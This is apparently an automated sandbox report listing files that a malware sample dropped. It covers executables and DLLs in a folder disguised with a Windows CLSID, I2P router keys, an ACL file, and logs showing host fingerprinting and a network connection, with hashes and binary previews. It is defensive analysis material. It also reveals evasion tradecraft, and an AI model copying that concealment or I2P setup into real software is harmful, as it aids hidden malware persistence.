                  Preview:*....\....jg:.....=.........m{E.?_8.[.p.... .7.WWV.P4.....Y.?t1y..o.#..AB....n.P...j....G!.Qz@..8M.LJ.p...(Y..a.D.$FDL...JQ.......p..!.]]_?...l.....G....b..}..."..R..l(x.`N..3.J..>...7.fJ.j.f...Y....g.....r..U........M.....-]..6.#.F..4.p..2..x..xx_'..........%..E.ld.Jy|F.<.`<y...Ah.........`H\...w..b...E ....W...+...w...>Zx.....hCi.']...Va.Tf..Q..`...."..IB.. .O....!l...r."J;..u.}U[Nj....4.......(.T.L..a..'>...s .%z.._u?.l,&B.%.d.qr..4G...a..Q...L:E....k...G&.S-0..$.d.h.<.....J

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\o3ostswbtbg6rofbj7mtlevgtukkyje5smmmvnfoqvu6yo7rwimq.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.5867845737732615
                  Encrypted:false
                  SSDEEP:12:wvFkL4AYX1Nj8wtKTYx/SZ8GjCrUd4KNiFcMBsLtrpRMBrPNh:wdVBjVKOamBgyKNEcMqLfyrh
                  MD5:450A5331471E6F1860DD3D00ADD32D5A
                  SHA1:49AA7CD997413539A0A592FF2FC65A2EC529A5F2
                  SHA-256:812CC4B06C3A314C5F4A8AE92EE0992782639F663EF12BC39F2320F7477C1D74
                  SHA-512:002D494439B1BC988B1C679980D2A5DFB6EF2A1B158CF2536D1F3D19BB3178D6D6452B0BEBE08B4D2E7CCF4CD8069838652B38BEA94FFC5DC73D60A8FD2F7D57
                  Malicious:false
                  Preview:>....9.X..O+.@>..`9b..B.d..`.(..H`VC...Gl....z........m..q./...[W...;&.yy...'....v..,.H..Y.Wo.&.q..x.R..F .....e,........p.v..3.A..X....K..TC..y.;<*F).V.....M.."....x.B..c...C.u.....)y.....oR#...K.Y....y.....h..x-d.~...Q..g.nz...L..p)&...:..|.k....p..R.....;.$..%E~.C..|.8eE1.&.......-....e.0.%.V..L......w|........^.....4.s..9.y=. |Q;N...g.sR.4.....O..lH..:.(.$1....#".w:A...{.:......3_..U..~.+!......5B!.$C...`.2m.Tj..mEs..?..S.[...../...h...|....e.2..M......X..;...v.....P~.a5.

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\qxeuabsm7q7kzvlxgw3lvfhfpomcma4lhu7iurnqljip7swpzr7q.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.542990531846028
                  Encrypted:false
                  SSDEEP:12:yEMrEf+M/kVTDxr1xwJXl32fG1j6zslpM:HMW+WQ1HWdYGtbq
                  MD5:C2FE0BC924CA5ADDB87C8A90DAC6150C
                  SHA1:FCE7D45BDFCBDF8794AA542CE656A280266786C1
                  SHA-256:8B39BD151E99A197CF7F53DBF923AA78C6946887DB95FC4B3CEF8E238F1C60EC
                  SHA-512:74F9B21D87EA57CC05863D24FBACF7B3F4BF3712F622F7195DA9F91C26CD305361BDEA7B1876B918F0D690F81A4FE0FCF3B3FE207E7097E9BB015A2204EB3EA6
                  Malicious:false
                  Preview:..Q=....Ls.........JTz...!.*..I..0 ....3%....X.h...i...>...cJ9...g.._c.>m9........{Z....0....o...V..kCY..toT}./!.66..c...d.......#...'Ou.#A..../.O.:.j......yr.....\.:.S0O..8W....q# ....]..6.Fw\.H.L.>.6..z....l*.#..(.dB..$.M.....d.....Mf..(..o.qS...%.*..82....*..s3 ;.J..<.Z..s_.....c....Y.sh..m..m.bGP8^....W5.F..1@.TJ.......u&yj1.......s.....5/.6.8..dH.....x..C<.b.o.....P...+.7.C...5.>>$.<).M....2pb..B.O......!.8.g...........tt..v.P.v...jq.uch...%........|.P0..D....o[k...<.c...

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\rjairrmutqifuu2dyvegvzaejsapwe7npnton7xili2suvbbxpba.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.599560299028174
                  Encrypted:false
                  SSDEEP:12:7qU0kP/OuluTfPFXro8RB4soJaIRtJrffKpxya5KcWONPMqSAstuYBb2yjLqwxOG:OUJP/dyfRB4sokI7JbfeyaBdxIb27m
                  MD5:E1A7B4397B96265320D57AA70CB57A21
                  SHA1:DBD13B47ED717A58F45DDEBACC8133F0BB167426
                  SHA-256:D27AB76578EE2E23812DDCE17255CBBBD625840B294138308E364722BB3B6803
                  SHA-512:2FCD1F202F05C5D9168AEBA4A6522D0B07042661C649DED9BB83F9C5C4827A4E8433878F0CB6825B3192C8B007FA7560A04CD0E688864220DF8CA2537B601F97
                  Malicious:false
                  Preview:3..:..8.s$.../...I.]zK........:.?..wJ.R.....a.....X.-.]x.j..W..~......@l.$2..w_...]?........u.46j!u...r.......h.&]...[K.....G.v..v.Ckgr....d.....y.....l...%..c@VS..59.{.....u]..c7x^to.&4..!&...l.....(.....7*..;.|..j.....G..k..8"ay..^./.O..6.\.l.............e...R.).qE..G...:b..4O.>".4..f .&0.DL2.a..$/Y..}.T.m.".bfU.t.....TD..OwD.&..g...3.5?.u.sJ.#.b..l..Z....h.".11.U...ilD^.... g ..9..,...-.b*.I..!......tX..8...m...72.N.g.}.....O.7{"1>.eb.....L"-.&D..............8v..~....^T..

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\rni3zpmvwwukz6scp7m74ogzcibuwcqufvobcyd44ssl46r6lzia.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.55823785108821
                  Encrypted:false
                  SSDEEP:12:P/XEtPS+TEuvJI7W9SYYjNnlxMgfs4gwM08i1wsmxb18:H0tPS+TVuWwYYjNnlxlDMY1jmx2
                  MD5:62FA048D60A01E0146EE6E4B50D287D4
                  SHA1:76AB963105C3D8417796C3A98C076AEC4C3E6DF7
                  SHA-256:BA7941CF342F1D45B8B104C078AB82D61ED200D8937F5CBEA87B88264DAE78D7
                  SHA-512:C2E660E130A00EEB75E92598EA518E505ACB0598CD6C3A666AEA8E27F6CF1FE2C01C63C7FFDA79FE177341A691E8557F76C83CD6E41599E410A41E9D4FFBDC99
                  Malicious:false
                  Preview:$..V..<.d.I-....Pp......y..j.p.?.n#E../v.......L1...[<..v....5...h..W.Y...DVvJI%S...PX.KSW...R...S....[.d...;.Hu".Kv.......TdM...|..n.w...h..5).WX#..G%W..h.[]h;....3.....m.P#...x..r.....+.@-.{......2...s..t..J.L.$....O.7......?..:..&a:U.t.?C.Ub.4.d..v...z.2..P..?.$P0.HTM.fab$..3.<.Za.eAQU......6.........V._ pa.I/....<..N.'..v.Y..kL..........J...1g......,.....I....J........s`ve.Im....$.L..t.....9.,.p..'......R.....K...X....V......WXm"...gt...;...@....`>Us..BBY../")....F.j..

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\tgk34p7xbscpswqequw4eg3uva7ujbnqguh2vp4blsvlxux2hnya.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.544849661689239
                  Encrypted:false
                  SSDEEP:12:NklLVPzjtvh+p7Yfe5ds8Mi1J1f1SklCA:NcLVfxo6fejN1SWCA
                  MD5:ED049C0A67254803FCF37AE416AA3E33
                  SHA1:FFA407AC48A97B3878F9512D265B8AC06DC509A2
                  SHA-256:992D78CD757880A032AF02AD5FCC6D631B64EDDAA5F8B01EDE60EAE29008A4AF
                  SHA-512:5273CCFA5D9F46F410D9DA0CA498A68AADE6DCFE4787396DE7CB2270DB7D0CEB018E7D74FE4A351B4EFCD4B82E311DF821626AFFF330978310884130D1949D17
                  Malicious:false
                  Preview:.vId.......".P.v.6.@FT(.9.......8......9.1J.3C..d.N|.X6#e..J...>Q.q..,>.w....4.+.]....{......%&x..@..6|mz_...x....g.....'.W..q...c)...Wy.ug..a.g).....lh ..........NM4b......I.a5y.y..B.V.._.E..N......%...].Q.B.(.@.Y..e..HY..98.%M...?.........mCLl.d_|Ae....YO.......f'.K.v.Y.]..5.hyK~.N2..8Q..:.>F.b..i.CE.CK!X...>.;...H.3..6|a...#...<..B_s83.....;.;.{l....Y......R..lz.....a.x....g..|nA9.c.tF..VKCv]9]......1 H...h...M9.h,.K.B/*..O.I...5.[..{...[...).....0...G,.....|.....}.;..D.!..

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\usvnwljgmw5lx2wv667re7b7s32tjlvdz57gyuvtzjsatvgwec4a.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.553247310928163
                  Encrypted:false
                  SSDEEP:12:6OWSQv6dgA/jpemPEw2oo+jG414DlfQ4HZ5w1+fj9jD:KYdHrpemsovG4mhfvHjwsRjD
                  MD5:C6CF55E06E4FEA80F4434AEBD63612EF
                  SHA1:C018409C2F821A9C468CF98A24B4DE94D1D55F23
                  SHA-256:F7CC8E8CDD2B93940879E3606857CE3183E06E83B0DC3A7DA06ED5EE53DEA1A3
                  SHA-512:2FFB4D6E4FE1C4C7A44FC794014ED3FCFC2C648620445717F47040B52B6D1964CBE099E11E178D5800C1C79C314C63AB762567A879FB1242A046895116DEEAE0
                  Malicious:false
                  Preview:......(]..I.<.....n..mQ./f.....b..`nf./O.S.?L.]@.....E".f.'.=1..9..;..#.....IG....'.F"..4bn.`..........G..~..W..i..m..R...|9n.8..i...jA..A.o..U..u^.....+"...jH..u.yn:N.Y.a.L^..:.........}...*.1$E.......L'...e...CH....g..F;.v...Hk.1.........y..yc..........^.P....d.88X~.Re1...k...KT*.4.R.S.W.Gk.c..Q.{.q..R"dc.,..FR........W.r|T.......@...e..4..m'BI..z..X$]..P}...gP...M]V.j...#.a.A\.W^M=...d.......Nf.((J....L....O.]^gg......$...A...Z..m...RUQ.J.s._.8p?8y.y.Vs'.......$..a.....s.....n&

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\wmjvbs3i4j6dkjmjswk7qwwhxf4yap3faowuazz2ghru6j5y3jfq.dat

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.624068592945783
                  Encrypted:false
                  SSDEEP:12:1GfPhlGgvYcPMQlOcuXCQ+qzUTS//ZJ77pjo9:1GHGrcPtUfUm/Rjo9
                  MD5:C606FBC54B285D4642B26C5C64BB2101
                  SHA1:07F629AC4782E929FB65D8BA40FF096C9A9AC42B
                  SHA-256:5079BFF4A5AF8F51CB1AF8CB263CEA9BBCE1BA600B780F716559ED0AEF262FBF
                  SHA-512:3840701493F07FA98EA1ADC49794F405EC36C093D79C2C6DE09A1C3B2B041EA27D3784F6213C50E5274980B71B5CE544858C37CE7E862333C10FFB513481653A
                  Malicious:false
                  Preview:|J).qVn...j...-..b...E].....r..!O..p.e. (1g..#b=f.IC:>.E..?.m..Q..F..9pf.3.D...."BwP.;t..@.}.....j.L....n...'p.."j..{..J..M.W..E.p.8.nJI.J.)...v... ..J{...,/.O..r.[..ei}..U..6..koYH..]:..IC2:...L..a.2<..E.J..s..=.A...._.\.H@E+.c...f...1FL..:./.J....s.....4.l...........`.][.k.v&Wg5.J.......9G..............<]T....s..[..I....]..w\.~'JE.0.`.I........:..z.....g...+.h.x.z<....F......\.U...".O...dj3..]I*.p... "THdNP.k..F.T......"qX....;...$.;..kt.........<jlq..I.!>B;.$.|05....Z.N.........(.

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ntcp2.keys

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):80
                  Entropy (8bit):6.037492001110315
                  Encrypted:false
                  SSDEEP:3:xVE+YLU4Q23PHp5xtU9RE/dP5:3tsBQSrfIEZ5
                  MD5:392741C71213C998A0DE150EADDAF2C2
                  SHA1:964F24D82EAD7C4F76138CE2D74DB5933DF68CE4
                  SHA-256:4856D55E42ED990BADCC65A1E629AD7617F9E461FD34D38E4963CACB565BA26F
                  SHA-512:FAF3A2CF93A1B69D32433C83C3F741EAA38324E4F9884E314395A12BDD3A008AD954399FF55C4CBBDE25A93ED47941EA1242D8FB1441D3B546CD854AD2B762EF
                  Malicious:false
                  Preview:..t..>...z.8..`4.*G....=.I.Y....u...g.!p.e....~............Y.7%M...4.O.....K

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.info

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):721
                  Entropy (8bit):6.670880900292129
                  Encrypted:false
                  SSDEEP:12:/kuIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCArTwk4yDkfIl:8PRlRlRlRlRlRlRlRlRlRj2yyHRydnJz
                  MD5:8B09EA9878A6420D1EADEA7904AC4EA5
                  SHA1:9834C062114D163B13538905F622BAD55A6014F6
                  SHA-256:8CC76835983C1A2F391F4BC4FDDFEBE9B4C868B2AE983C2C07B72AA02AF5FE2B
                  SHA-512:A5551618850E727C3D1BEA71297C5AD73363D54DCD508E7E5AD892FA9399707CD884B6347B83AFEEC41A6FCF2AC8EC9FB557F417A4FA78665620ACCDC7082D15
                  Malicious:false
                  Preview:.....An.~._!Jt.....[.s...3.....s.h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(..I..A.fkM.....?_....w.A.X[.QB...............0NR...........NTCP2.@.caps=.4;.s=,F4d0G90-htEBetk4DBpgNK0qR~e7~YM9x0m-Wd7vkAU=;.v=.2;..........SSU2.q.caps=.4;.i=,Tuv55otY-QEjSjfjF-BMHhqj3ZCdFYB3KA2tvlPO0rM=;.s=,Q1c8WvuOm~jxOzaOjECcC2Qatq0u6KT4wPaQ6io~-1I=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.60;+c!..&/..O.}..:..)y.6..A.....9..|pq...t.O(_........~..G.&#..

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.keys

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):455
                  Entropy (8bit):6.1395387447907614
                  Encrypted:false
                  SSDEEP:12:/kuIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCArTwk4yEqjQr:8PRlRlRlRlRlRlRlRlRlRj2yb+
                  MD5:97C6BB9B99A9E9E70EC9B2B807D4D117
                  SHA1:DE3D4E8E6E0F8AC5F594C1B8F7D2AC2B0935B76F
                  SHA-256:EEA0E2D55DD19FE7CD02CED80463823477DECB9B61AAF8C38AF8E1E23C69E259
                  SHA-512:2E805954E100496C02BDFF334C58DA4FFB7CF94E3E002B62F1F491AC5A96D1C608C65A663DE6BC83055BF216BA8D32E10AC94823C77E159BFEB937BCF174079E
                  Malicious:false
                  Preview:.....An.~._!Jt.....[.s...3.....s.h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(..I..A.fkM.....?_....w.A.X[.QB............j....lF.a.........j.;..7B..E~.....)..=.C....I.=0.T.BVkw/fz.

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ssu2.keys

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):96
                  Entropy (8bit):6.314129167387828
                  Encrypted:false
                  SSDEEP:3:jft9surlY5mXXpfGdWViwIn2Wn:jl9rAmpPxIn2Wn
                  MD5:341B9BA4A056FD653CCF2AD78ABF854E
                  SHA1:034365159BA29815F85EAF83929ECCDB287109A9
                  SHA-256:F4D9CAA5F14B6FC218C0D77980C1F03BAFC57F87A93F92D3338AAD42DBDAC1F4
                  SHA-512:644DBF9735F672340482357AD7A0B71242E5188BCDE1A8335AA09A1EC5BFCD0398EBCBEEC2534EEB9CA6B112E3F526BD291D0D4C5A5546046621E1772D82A977
                  Malicious:false
                  Preview:CW<Z.....;6..@..d..........*?.RP..k...j....0....'.]...f..s.`.EN...X..#J7...L.......w(...S..

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):9146880
                  Entropy (8bit):6.674868432808522
                  Encrypted:false
                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                  MD5:676064A5CC4729E609539F9C9BD9D427
                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Joe Sandbox View:
                  • Filename: file.exe, Detection: malicious, Browse
                  • Filename: file.exe, Detection: malicious, Browse
                  • Filename: file.exe, Detection: malicious, Browse
                  • Filename: file.exe, Detection: malicious, Browse
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):89088
                  Entropy (8bit):6.205377670389132
                  Encrypted:false
                  SSDEEP:768:y5rUJUohYhdi9PbahfxaxQo9uYN/kpYBbMQGwryimzgvmak7EoKk1dhJJY9V/Sbf:digoZax39NN/DBgQVmzg5kF/ctIN
                  MD5:BB070CFBD23A7BC6F2A0F8F6D167D207
                  SHA1:BDB8961F8AFB999AECE60BF1EF3E49E8E2349F7B
                  SHA-256:C0860366021B6F6C624986B37B2B63D460DD78F657FC504E06F9B7ABBFDC2565
                  SHA-512:93D052675636FBE98204EF8521B9F10F8A0CBCAC40E8835AD8249DAFD833C29B7F915A898671B21064D4ED6D04DA556D9D3647D03EB93232ADB2ACD2D7DC1F8A
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*.....X.................@....................................-.....`... .................................................P............`..X............................................B..(....................................................text...X...........................`..`.data...............................@....rdata...Q.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):13511
                  Entropy (8bit):5.603686264960938
                  Encrypted:false
                  SSDEEP:192:AzOTi0dAQXh1d8yX7E0w86ocoX3wgox879FKZ+8u++faD8dBMGqa89nsUEg8HoOp:sOT2zEz5NvAbp+Kz/1B2X0rnC
                  MD5:E8524DE0DDB8DFAFF080F03A57FC5B67
                  SHA1:E0A34AAA587AD55C94C3250CDBEB115CDCDA3401
                  SHA-256:6DE9766FCAC93634F083E4CD1448C0D626958CDC381285C24B0C999545744567
                  SHA-512:916BCB51E7BB952C6981FA26E02532985376D99DEA325C26FD83BEA53933FA939163353463493B3E6FA948D657683C676121F75A7883EF4B4F26BE32FF267744
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg,buf_sz=10480965)..[I] (fs_path_expand) -> Done(path=%TEMP%,xpath=C:\Windows\TEMP,xpath_sz=15)..[I] (fs_path_temp) -> Done(path=C:\Windows\TEMP\PrnaubOU,path

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):456
                  Entropy (8bit):3.2341395630162877
                  Encrypted:false
                  SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                  MD5:40AB00517F4227F2C3C334F1D16B65B4
                  SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                  SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                  SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                  Malicious:false
                  Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):105984
                  Entropy (8bit):6.285421743969757
                  Encrypted:false
                  SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                  MD5:6E01ED70D02CE47F4D27762A9E949DEE
                  SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                  SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                  SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4989431
                  Entropy (8bit):5.005298546018559
                  Encrypted:false
                  SSDEEP:192:AONOTB0+55555555555o5555o5555555555555555555555555o555555555555y:NNOTF
                  MD5:78F5E6B53B87ABDBB87B5BE0B7473F24
                  SHA1:12B90FDFF40BC73A5D8B2C4C76C81C1A261102B4
                  SHA-256:623E470D5E7B9840FBC3DB796C5514BE4F06324BA311E967D0F02A5132546449
                  SHA-512:01A0A54616CFBBC4FACA034B99F92151DD98CBAA39EDD64AB1E4C817D859E358437F1967919B18C0A9436432F80CDEF1155453CDE391BD784FC0E6F324031328
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8ba50a8a0)..[I] (tcp_connect) -> Done(sock=0x388,host=7

                  C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):129536
                  Entropy (8bit):6.2852879161990645
                  Encrypted:false
                  SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                  MD5:88E6178B0CD434C8D14710355E78E691
                  SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                  SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                  SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                  Malicious:true
